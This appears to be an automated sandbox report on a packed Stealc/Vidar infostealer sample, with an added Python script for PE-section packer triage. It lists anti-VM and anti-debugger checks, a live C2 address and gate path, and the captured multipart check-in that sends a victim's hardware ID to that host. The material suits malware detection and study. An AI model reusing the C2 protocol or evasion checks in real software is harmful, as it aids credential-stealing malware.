                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009E1160 GetSystemInfo,ExitProcess
                Source: file.exe, file.exe, 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2101658537.000000000139E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareA
                Source: file.exe, 00000000.00000002.2101658537.0000000001411000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2101658537.00000000013E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2101658537.000000000139E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13654
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13657
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13669
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13709
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13674
                Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe File opened: SICE
                Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009E45C0 VirtualProtect ?,00000004,00000100,00000000
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009F9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009F9750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009F78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
Source: Yara match | File source: Process Memory Space: file.exe PID: 3356, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_009F9600: CreateToolhelp32Snapshot, Process32First, Process32Next, StrCmpCA, CloseHandle (walks the process list and compares image names)
Source: file.exe, 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: {+lProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_009F7B90: GetKeyboardLayoutList, LocalAlloc, GetKeyboardLayoutList, GetLocaleInfoA, LocalFree (keyboard-layout and locale enumeration)
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_009F7980: GetProcessHeap, RtlAllocateHeap, GetLocalTime, wsprintfA
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_009F7850: GetProcessHeap, RtlAllocateHeap, GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_009F7A30: GetProcessHeap, RtlAllocateHeap, GetTimeZoneInformation, wsprintfA

                Stealing of Sensitive Information

                barindex
Source: Yara match | File source: 0.2.file.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2101658537.000000000139E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2051322816.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 3356, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
Source: Yara match | File source: 0.2.file.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2101658537.000000000139E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2051322816.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 3356, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK matrix (reconstructed from the flattened table: one line per tactic, the eight row cells in order; the numeric prefixes are the report's per-technique match counts, kept as printed)

Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS | Network Trust Dependencies
Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services | Serverless
Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services | Drive-by Compromise
Execution: 2 Command and Scripting Interpreter | 11 Native API | At | Cron | Launchd | Scheduled Task | Systemd Timers | Container Orchestration Job
Persistence: 1 DLL Side-Loading | Boot or Logon Initialization Scripts | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job
Privilege Escalation: 11 Process Injection | 1 DLL Side-Loading | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job
Defense Evasion: 1 Masquerading | 33 Virtualization/Sandbox Evasion | 11 Disable or Modify Tools | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | 3 Obfuscated Files or Information | 12 Software Packing | 1 DLL Side-Loading
Credential Access: OS Credential Dumping | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync | Proc Filesystem
Discovery: 2 System Time Discovery | 641 Security Software Discovery | 33 Virtualization/Sandbox Evasion | 13 Process Discovery | 1 Account Discovery | 1 System Owner/User Discovery | 1 File and Directory Discovery | 324 System Information Discovery
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management | Cloud Services
Collection: 1 Archive Collected Data | Data from Removable Media | Data from Network Shared Drive | Input Capture | Keylogging | GUI Input Capture | Web Portal Capture | Credential API Hooking
Command and Control: 2 Encrypted Channel | 2 Ingress Tool Transfer | 2 Non-Application Layer Protocol | 12 Application Layer Protocol | Fallback Channels | Multiband Communication | Commonly Used Port | Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel | Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery | Defacement
Antivirus detection (submitted sample)
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML | (no label)
Remaining detection tables (dropped files, unpacked PE files, domains, URLs): No Antivirus matches
No contacted domains info

URLs (from network traffic)
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/ | true | (none) | unknown
http://185.215.113.206/e2b1563c6670f193.php | true | (none) | unknown

URLs (from memory strings; the variants below differ from the real URLs only by trailing bytes the string scanner picked up after the URL)
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/e2b1563c6670f193.php/ | file.exe, 00000000.00000002.2101658537.00000000013F8000.00000004.00000020.00020000.00000000.sdmp | false | (none) | unknown
http://185.215.113.206/e2b1563c6670f193.phpJ | file.exe, 00000000.00000002.2101658537.00000000013F8000.00000004.00000020.00020000.00000000.sdmp | false | (none) | unknown
http://185.215.113.206/3C; | file.exe, 00000000.00000002.2101658537.000000000139E000.00000004.00000020.00020000.00000000.sdmp | false | (none) | unknown
http://185.215.113.206 | file.exe, 00000000.00000002.2101658537.000000000139E000.00000004.00000020.00020000.00000000.sdmp | true | (none) | unknown

Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1543217
                            Start date and time:2024-10-27 13:03:07 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 10s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes:2
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 90
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated
                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: file.exe
                            No simulations
Context for IP 185.215.113.206 (other samples that contacted it)
Associated Sample Name | Detection | Threat Name | Context
file.exe | malicious | Stealc, Vidar | 185.215.113.206/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.206/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.206/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.206/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.206/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.206/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.206/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.206/
file.exe | malicious | Stealc, Vidar | 185.215.113.206/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.206/e2b1563c6670f193.php
No context

Context for ASN WHOLESALECONNECTIONSNL (other samples using this ASN; the same network also hosts LummaC C2 at 185.215.113.16)
Associated Sample Name | Detection | Threat Name | Context
file.exe | malicious | LummaC | 185.215.113.16
file.exe | malicious | Stealc, Vidar | 185.215.113.206
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | LummaC | 185.215.113.16
file.exe | malicious | Stealc, Vidar | 185.215.113.206
SecuriteInfo.com.Win32.Evo-gen.20836.29869.exe | malicious | LummaC | 185.215.113.16
file.exe | malicious | LummaC | 185.215.113.16
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | Stealc, Vidar | 185.215.113.206
file.exe | malicious | LummaC | 185.215.113.16
No context
No context
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.9463678010723795
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'866'752 bytes
                            MD5:d42e9bebeb9d3f72398f5a5211b649e1
                            SHA1:677dc85715152bdc047d55a0a7843ea53690274c
                            SHA256:70d701780ae74623c6f20f75516cecba15aff040750f911bc73b311a5482b622
                            SHA512:8f9638b2783508aa29b36626a8520858a0cc71cdd5daa055edef9ca4e833edd1ec39cb0549d821b7b19fb75d2af74268fb98bbce00ab57fb257aeac3c4dfe450
                            SSDEEP:49152:w5/Y2wL1rcthKSQaL4EatSJrH2RtQBguaCj6gZ:w5/Y1eCSQaL4EaBuBgu6A
                            TLSH:3E85338A455F652DCF8B43F81F390CD4C82C2E77D778125BA672B1295BBB2D838150EA
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...9$.g...........
                            Icon Hash:00928e8e8686b000
Entrypoint:0xaa5000 (RVA 0x6a5000 at Imagebase 0x400000, inside .taggant rather than a code section)
Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x671C2439 [Fri Oct 25 23:05:29 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b
Entrypoint preview (disassembly of the first bytes at the entry point; repeated instructions collapsed, the rest is padding: 00 00 decodes as add byte ptr [eax], al)
jmp 00007F66B068D07Ah
cvtps2pd xmm3, qword ptr [eax+eax]
add byte ptr [eax], al (x2)
jmp 00007F66B068F075h
add byte ptr [ebx], al
or al, byte ptr [eax]
add byte ptr [eax], al (x2)
add byte ptr [eax], dh
add byte ptr [eax], al (x3)
add byte ptr [edi], bh
add byte ptr [eax], al (x3)
add byte ptr [edx], ah
add byte ptr [eax], al (x67)
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al (x2)
adc byte ptr [eax], al
add byte ptr [eax], al (x3)
or ecx, dword ptr [edx]
add byte ptr [eax], al (x3)
                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319
Data directories
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
All other directories (EXPORT, RESOURCE, EXCEPTION, SECURITY, DEBUG, COPYRIGHT, GLOBALPTR, TLS, LOAD_CONFIG, BOUND_IMPORT, IAT, DELAY_IMPORT, COM_DESCRIPTOR, RESERVED) | 0x0 | 0x0 | (none)

Sections
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(blank) | 0x1000 | 0x25b000 | 0x22800 | a65303f806afc76ba826fefc9da5d940 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(blank) | 0x25e000 | 0x2a4000 | 0x200 | c1709659527761b655bd64850655905b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
viycrjrr | 0x502000 | 0x1a2000 | 0x1a1800 | bbfdb9c58059aadfa4c43e025b317c99 | False | 0.994612532747006 | data | 7.953397310962952 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xfsmgicr | 0x6a4000 | 0x1000 | 0x600 | f56c0b46749c83192781ee913133a075 | False | 0.5807291666666666 | data | 4.956026029906863 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x6a5000 | 0x3000 | 0x2200 | a1a7e5da0537a3e5582213b558fe74fe | False | 0.059283088235294115 | DOS executable (COM) | 0.7959220511683656 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

The layout is a packer's, not a compiler's: two sections have no printable name, five sections are both writable and executable, the 1.6 MB viycrjrr section sits at entropy 7.95 (compressed or encrypted payload), and the entry point is in .taggant, the IEEE Software Taggant section some commercial protectors append. The raw file carries almost no code in .text form; the unpacked image the sandbox dumped (0.2.file.exe.9e0000.0.unpack) is what the Yara rules matched.

Imports
DLL | Import
kernel32.dll | lstrcpy
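The checks behind the section-table findings above can be scripted. The following is an added example, not Joe Sandbox or sample code: a small PE section-table parser that flags the same packer traits the report lists (entry point in a non-standard section, empty or unprintable section names, writable-and-executable sections, near-8.0 entropy). Because the real file is not on the page, `build_sample_pe()` constructs a PE32 whose section names, RVAs, sizes and characteristics mirror the table above; its raw bytes are filler (random data for viycrjrr, zeros elsewhere), so the MD5s and most entropies do not match the report's. The two blank-named sections are given empty names, an assumption: the real names are simply unprintable. `STANDARD_NAMES` is this example's own list.

```python
"""PE section-table triage for packer traits. Added example, not Joe Sandbox
or sample code. build_sample_pe() is a constructed PE32 mirroring the report's
section layout; raw contents are filler."""
import math
import os
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
# Names a linker normally emits (example list); an entry point elsewhere is suspect.
STANDARD_NAMES = {".text", ".code", ".data", ".rdata", ".bss", ".idata",
                  ".edata", ".rsrc", ".reloc", ".tls", ".pdata", ".CRT"}


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty or constant input, 8.0 for uniform."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes):
    """Return (AddressOfEntryPoint, [section dicts]) from an on-disk PE image."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    nsec = struct.unpack_from("<H", pe, coff + 2)[0]          # NumberOfSections
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]     # SizeOfOptionalHeader
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]     # AddressOfEntryPoint
    sections = []
    for i in range(nsec):
        off = opt + opt_size + 40 * i                          # IMAGE_SECTION_HEADER is 40 bytes
        name = pe[off:off + 8].rstrip(b"\0")
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", pe, off + 8)
        flags = struct.unpack_from("<I", pe, off + 36)[0]     # Characteristics
        sections.append({"name": name, "va": va, "vsize": vsize, "rawsize": rawsize,
                         "flags": flags, "entropy": entropy(pe[rawptr:rawptr + rawsize])})
    return entry_rva, sections


def triage(pe: bytes) -> dict:
    """Return the entry-point section name and a list of packer-style findings."""
    entry_rva, sections = parse_sections(pe)
    findings, entry_name = [], None
    for s in sections:
        label = s["name"].decode("ascii", "replace")
        if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["rawsize"]):
            entry_name = label
            if label not in STANDARD_NAMES:
                findings.append(f"entry point {entry_rva:#x} lies in non-standard section {label!r}")
        if not s["name"] or not all(0x20 < b < 0x7F for b in s["name"]):
            findings.append(f"section at RVA {s['va']:#x} has an empty or non-printable name")
        if s["flags"] & IMAGE_SCN_MEM_EXECUTE and s["flags"] & IMAGE_SCN_MEM_WRITE:
            findings.append(f"section {label!r} is writable and executable")
        if s["rawsize"] and s["entropy"] > 7.5:
            findings.append(f"section {label!r} entropy {s['entropy']:.2f} (packed or encrypted data)")
    if entry_name is None:
        findings.append(f"entry point {entry_rva:#x} maps to no section")
    return {"entry_section": entry_name, "findings": findings}


def build_sample_pe() -> bytes:
    """Constructed PE32 with the report's section layout (assumption: the two
    blank-named sections get empty names; the real names are unprintable)."""
    layout = [  # (name, VirtualAddress, VirtualSize, SizeOfRawData) as in the report
        (b"", 0x001000, 0x25B000, 0x022800), (b".rsrc", 0x25C000, 0x001000, 0),
        (b".idata", 0x25D000, 0x001000, 0x200), (b"", 0x25E000, 0x2A4000, 0x200),
        (b"viycrjrr", 0x502000, 0x1A2000, 0x1A1800), (b"xfsmgicr", 0x6A4000, 0x001000, 0x600),
        (b".taggant", 0x6A5000, 0x003000, 0x2200),
    ]
    opt_size, file_align = 0xE0, 0x200
    raw_base = (0x40 + 24 + opt_size + 40 * len(layout) + file_align - 1) // file_align * file_align
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(layout), 0x671C2439, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                    # PE32 magic
    struct.pack_into("<I", opt, 16, 0x6A5000)                # AddressOfEntryPoint, inside .taggant
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, file_align)  # ImageBase, alignments
    headers, blobs = bytearray(), bytearray()
    for name, va, vsize, rawsize in layout:
        flags = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
        if name not in (b".rsrc", b".idata"):
            flags |= IMAGE_SCN_MEM_EXECUTE
        # viycrjrr holds the packed payload: random filler reproduces its ~7.95 entropy
        data = os.urandom(rawsize) if name == b"viycrjrr" else bytes(rawsize)
        headers += struct.pack("<8sIIIIIIHHI", name, vsize, va, rawsize,
                               raw_base + len(blobs) if rawsize else 0, 0, 0, 0, 0, flags)
        blobs += data
    image = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(headers)
    return image + bytes(raw_base - len(image)) + bytes(blobs)


if __name__ == "__main__":
    for line in triage(build_sample_pe())["findings"]:
        print(line)
```

Run against a real file with `triage(open(path, "rb").read())`; on the constructed image it reports the entry point in `.taggant`, two unnamed sections, five W+X sections and the high-entropy viycrjrr section, which is the same picture the report's signatures draw from this sample.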
IDS alerts
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-27T13:04:03.454796+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | TCP
TCP packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 27, 2024 13:04:01.916923046 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Oct 27, 2024 13:04:01.922621012 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Oct 27, 2024 13:04:01.922733068 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Oct 27, 2024 13:04:01.922887087 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Oct 27, 2024 13:04:01.928268909 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Oct 27, 2024 13:04:03.149488926 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Oct 27, 2024 13:04:03.149602890 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Oct 27, 2024 13:04:03.149692059 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Oct 27, 2024 13:04:03.149732113 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Oct 27, 2024 13:04:03.163208008 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Oct 27, 2024 13:04:03.168632030 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Oct 27, 2024 13:04:03.454608917 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Oct 27, 2024 13:04:03.454796076 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Oct 27, 2024 13:04:06.198906898 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
HTTP hosts contacted:
• 185.215.113.206
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | 3356 | C:\Users\user\Desktop\file.exe
HTTP conversation (session 0; neither request carries a User-Agent header)

Oct 27, 2024 13:04:01.922887087 CET | 90 bytes | OUT
GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache

Oct 27, 2024 13:04:03.149488926 CET | 203 bytes | IN
HTTP/1.1 200 OK
Date: Sun, 27 Oct 2024 12:04:02 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Oct 27, 2024 13:04:03.149692059 CET | 203 bytes | IN
HTTP/1.1 200 OK
Date: Sun, 27 Oct 2024 12:04:02 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Oct 27, 2024 13:04:03.163208008 CET | 413 bytes | OUT
POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JKECGHCFIJDAAKFHJJDH
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 48 43 46 49 4a 44 41 41 4b 46 48 4a 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 45 42 37 32 31 36 43 31 41 32 34 34 37 37 37 31 30 37 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 48 43 46 49 4a 44 41 41 4b 46 48 4a 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 48 43 46 49 4a 44 41 41 4b 46 48 4a 4a 44 48 2d 2d 0d 0a
Data Ascii (CRLFs rendered as line breaks):
------JKECGHCFIJDAAKFHJJDH
Content-Disposition: form-data; name="hwid"

6A5EB7216C1A2447771074
------JKECGHCFIJDAAKFHJJDH
Content-Disposition: form-data; name="build"

puma
------JKECGHCFIJDAAKFHJJDH--

Oct 27, 2024 13:04:03.454608917 CET | 210 bytes | IN
HTTP/1.1 200 OK
Date: Sun, 27 Oct 2024 12:04:03 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s=

The check-in is the Stealc registration: a multipart POST to the gate script with the victim's hwid and the build name ("puma"). The 8-byte reply YmxvY2s= is base64 for "block", a refusal from the C2; consistent with that, the sample sent nothing further, dropped no files and exited, so the sandbox never observed the collection stage.
